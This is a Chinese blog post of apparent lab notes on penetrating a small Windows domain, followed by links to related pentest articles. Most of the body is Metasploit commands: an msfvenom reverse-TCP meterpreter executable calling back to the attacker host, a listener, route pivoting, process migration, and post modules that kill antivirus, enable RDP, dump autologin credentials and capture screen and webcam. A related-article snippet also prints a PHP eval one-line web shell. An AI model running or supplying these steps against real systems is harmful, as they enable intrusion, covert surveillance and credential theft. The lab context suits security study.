一次简单的域渗透

最新推荐文章于 2023-05-18 11:31:52 发布
最新推荐文章于 2023-05-18 11:31:52 发布
阅读量437 收藏 2
点赞数
分类专栏: 渗透 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/104965297
版权

攻击机:kali  192.168.44.131

军事区:window7 192.168.44.139   192.168.4.

非军事区: window server 2003  192.168.4.

kali:

返回的连接可以使用background 将当前连接切换到后台运行;

 

3、切换到后台的会话可以使用session -i查看到,然后使用session -i id 将后台的会话切换回前台;

 

4、切换到后台的会话可以使用session -i查看到,还可以使用session -k id 将后台指定会话中断;

 

msfvenom -l windows/x64/meterpreter/reverse_tcp -lhost=192.168.44.131 -lport=4444 -f exe -o shy.exe

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.44.131

set lport 4444

expliot

 

ipconfig发现另一网段

run autoroute -s 192.168.4.20/24 添加路由

run autoroute -p 查看路由是否添加成功

getpid 查看自己的meterpreter shell 进程号

ps 查看目标机正在运行的进程

migrate pid 将自己的shell进程移动到一个稳定的进程当中。比如Explore.exe.

getpid 发现自己shell的进程号已经改变,说明已经成功迁移到稳定的进程当中。

或者 使用自动迁移命令(run post/windows/manage/migrate)自己寻找合适的进程进行迁移

 run post/windows/manage/migrate 

run post/windows/gather/checkvm 

idletime

route

run post/windows/manage/killav

run post/windows/manage/enable_rdp

run post/windows/gather/enum_logged_on_users 

run post/windows/gather/enum_applications

run windows/gather/credentials/windows_autologin

load espia

screengrab screenshot

webcam_list  

webcam_snap

webcam_stream

shell exit

文件系统命令

pwd

getlwd

search -f 123.txt -d c:

download c:/123.txt /root

upload /root/123.txt c:

 

 

 

 

 

 

 

 

 

 

shy014
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Meterpreter后渗透模块之信息收集
sGanYu
09-23 2081
进程迁移 防止进程被用户关闭,移动shell 1)手动 先使用ps查看目标正在运行的进程 查看当前进程号 meterpreter > getpid Current pid: 1104 从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号 meterpreter > mig
【tools】Meterpreter 操作汇总
热门推荐
qq_21193587的博客
06-04 3万+
Meterpreter 介绍 Meterpreter 号称“黑客瑞士军刀”,Meterpreter 是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 RPC 服务的一个漏洞,当漏洞被触发后,我们选择 Meterpreter 作为攻击载荷,就能够获得目标系统上的一个 Meterpreter Shell 连接。Meterpreter 是 Metasploit 框架的一个扩展模块,可以调用 Metasploit 的
metasploit(MSF)渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1842
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
内网渗透中的思路之一
05-01
在进行内网渗透,尤其是在比较大型的网络环境下,很可能会遇到这样一种特殊的网络环境,而在环境下的内网渗透又将是另外一片天 地。
一次简单渗透(part 1)
初学者L_言的博客
11-12 2165
一、环境 环境是自己搭的,基本模仿的企业部署 :learn.com 操作系统类型 IP地址 本地账户/密码 账户/密码 角色 Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator DC控 win@2008.com win@2008.com
一次渗透尝试
weixin_30613343的博客
01-23 123
先对目标站进行信息收集:扫了下目录,iis6,发现了后台,并且存在目录遍历: 存在目录遍历我寻思着找点有用的东西,看看有没有前人留下的脚印啥的,直接踩上去多方便,但是翻了一半天无果。从前台找找有没有有用的东西,发现新闻更新的挺勤的,说明管理员还是经常上线,想着x点cookie,结果找遍了都没有发现可以x的地方。 结果惊喜发现存在sql注入: 做到了这里,...
一次渗透
LainWith的博客
12-31 1646
目录环境准备信息收集主机发现端口扫描网站探测指纹识别目录扫描SVN信息泄露搜索log日志绑定 hosts 碰撞管理后台登录后台getshell后渗透MSF获取提权迁移进程哈希明文发现内信息收集配置路由配置socks攻击控DC信息收集永恒之蓝攻击-失败用户提权漏洞(MS14-068)远程桌面登录用户-失败MS14-068连接控哈希明文远程桌面登录3个flag权限维持-黄金票据前提条件准备票据信息制作票据使用票据参考 难度不高,整个这玩意纯粹是想写写防御内网攻击的规则,搞点跟同事不一样的防御规则
简单渗透
qq_47271638的博客
02-10 2440
参考大师傅的连接 内网渗透-完整的渗透 文章目录一些基本知识控制器:活动目录:用户:建立环境渗透知识点:木马生成&msf上线知识点:简单提权尝试简单的提权操作知识点:信息收集&主机探测知识点:设置路由数据库登录模块提权(未完成失败了)hash传递攻击迁移木马哈希传递攻击拿下成员win2003kiwi使用拿下控主机补充知识点:其他获取密码的模块 一些基本知识 : ​ 计算机是一个有安全边界的计算机集合,在同一个中的计算机彼此之间已经建立了信任关系,在内访问其他机器,
渗透.pdf
08-23
渗透。 pdf
渗透之流量劫持
02-01
windowsDomain中文翻译为既是Windows网络操作系统的逻辑组织单元,也是...在网络渗透攻击中,攻击者如果获取了的权限,那么攻击者就有可能获取公司的机密,控制公司的一切。所以安全是企业安全最为核心的一个
渗透完全技巧.pdf
最新发布
10-03
1.无凭证情况下 网络扫描 漏洞快速探测 提权 拥有本地管理员权限 ...token窃取 ...卷影拷贝(获取控所有...服务账号破解 凭证盗窃 NTLM relay Kerberos委派 地址解析协议 zerologon漏洞 CVE-2021-42278 && CVE-2021-42287
关于渗透学习1
08-24
关于渗透学习,介绍各类渗透方法,内网渗透渗透学习渗透学习11
一次环境下的渗透
Mccc_li的博客
11-12 1300
渗透
渗透测试】---- 一次简单渗透
qq_43168364的博客
08-22 331
一、实验机器 控主机:win2008R2(192.168.15.142) 客户机:win7(192.168.15.143) 攻击机:kali(192.168.15.129) 二、实验步骤 主机发现,找到客户机,命令:nmap -sn 192.168.15.0/24 客户机IP为192.168.15.143,对其进行端口扫描,命令:masscan --rate=10000 --ports 0-65535 192.168.15.143 ...
内网渗透思路05之一次完整的渗透
划水的小白白
03-07 1942
7.1 拿到内网中一台机器的权限(一般是低权限)。 7.2 提取当前机器,但是失败 7.3 横向扫描内网其他机器存活 7.4 对存活机器进行常用端口探测 7.5 爆破mysql 7.6 通过数据库直接提权拿下内网中另一个机器 7.7 通过新的机器收集中的一些信息,获取到控的明文账户密码 7.8 先通过msf获取到控的会话,在找个合适的机会登录控 7.9 增加内网路由,配置socks代理 7.10 远程桌面登录控 7.11 一些其他补充
超详细的渗透过程!
xiaoi123的博客
05-02 1万+
大家好!我们在这个write up 里讲下几个不同的入侵 windows domian 时的横向操作。 内容不会过于深入,而会介绍一些基本技巧和流程. 为了保证测试客观性所以我将使用我们的测试对象 lock domain “REDHOOK”. 希望这会成为我们第一个关于 windows domian 的系列教程. 如果你要具体了解某些细节(比如kerberos 的 tickets)欢迎发email...
一次简单的内网渗透过程
战神/calmness的博客
07-24 342
目录 准备环境 端口扫描 永恒之蓝 MIMIKATZ RDP 登录 查看IP信息 查看有几个 共享目录 查看保存登录凭证 查看登录 查看所有计算机名称 查找目录中的用户 环境变量 查看控 查看里面的组 查看管 查看网段里的存活主机 准备环境 虚拟机:Winserver2008 r2 : 192.168.211.18 Kali : 192.168.210.249 端口扫描 永恒之蓝 发现445端口开放尝试使用永恒之蓝漏洞进行攻击 ...
渗透完整过程
weixin_30915275的博客
08-25 552
最近在整理资料时发现一些渗透笔记,于是翻开看看,原来有一个老外的内部网还没有拿下。当时已经给内网的一台机器种植了木马,反正闲着没事就拿它来练练手吧。打开远程居然肉鸡还在,废话就不多说了,下面开始吧。 首先来看看已经控制的这台电脑在内网中充当什么角色,并收集一些常规的信息。执行●ipconfig /all●(如图1)。 图1 ipconfig /all ...
PHP一句话木马使用技巧
shy的博客
01-20 1万+
近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。 PHP一句话:<?php @eval($_POST['shy']);?> firefox浏览器:hackbar 命令提示符:curl 首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站, 由于只是简单的一句话木马,因次一上车就收到了安全云的短信...
一次完整的渗透测试流程
05-23
一次完整的渗透测试流程通常分为以下几个步骤: 1. 阶段一:信息收集 这个阶段是为了获取目标系统的信息,包括IP地址、名、网络拓扑结构、操作系统、服务、应用程序等等。渗透测试人员可以使用各种工具和技术,如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值